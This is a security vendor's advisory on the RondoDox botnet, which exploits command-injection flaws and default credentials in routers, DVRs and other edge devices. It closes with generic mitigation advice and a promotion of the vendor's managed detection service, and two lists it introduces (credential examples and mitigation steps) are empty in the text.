Researchers reported on October 9, 2025 that the RondoDox botnet is exploiting 50+ flaws in internet-facing devices across more than 30 vendors. The campaign targets routers, digital video recorders, network video recorders, closed-circuit television systems, and web servers. After gaining shell access, the botnet drops multi-architecture payloads derived from Mirai and Morte malware families.
The first observed exploitation occurred on June 15, 2025, when researchers detected the use of CVE-2023-1389. This command injection flaw in TP-Link Archer AX21 routers was originally disclosed during Pwn2Own Toronto 2022.
By September 22, 2025, three months after the first observed exploitation, researchers noted a spike in exploitation activity. Shortly after, on September 25, there was confirmation of a loader-as-a-service model distributing RondoDox alongside Mirai variants. This infrastructure enables rapid deployment and rotation of payloads, increasing persistence and detection evasion.
RondoDox focuses primarily on command injection vulnerabilities, accounting for 50 of the 56 known flaws. Several of these have been added to the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities (KEV) catalog.
The vulnerabilities listed affect devices from a wide range of vendors commonly used in small office and home office environments. These include TP-Link, D-Link, Cisco, Tenda, Dasan, Netgear, Linksys, ZyXEL, Apache, and vendors using GNU Bash in embedded systems. Many of the flaws were targeted due to widespread deployment and inconsistent patching practices.
Researchers also noted that the RondoDox botnet is taking advantage of devices with weak or default credentials as well. Examples include combinations such as:
These credentials are commonly found on internet-exposed routers, digital video recorders, and surveillance systems, making them attractive entry points for automated exploitation.
Organizations with internet-exposed devices are at elevated risk. Small office and home office networks or enterprise edge environments are especially vulnerable due to the prevalence of consumer-grade hardware and limited patching cycles.
To reduce exposure, organizations are advised to:
Regular vulnerability assessments and configuration audits are recommended to identify exposure and enforce security baselines. Where patching is not feasible, replacing unsupported hardware and limiting internet exposure can reduce risk.
Field Effect MDR protects against threats like RondoDox by continuously monitoring for and rapidly detecting activity such as command injection attempts, unauthorized shell access, and payload delivery associated with botnets.
Field Effect MDR regularly updates detection logic and blocks malicious domains, payload fetch attempts, and known botnet infrastructure. With 24/7 expert oversight, threats are not only detected but also contained and neutralized in real time. This is especially critical for environments with exposed edge devices, where botnets often gain initial access.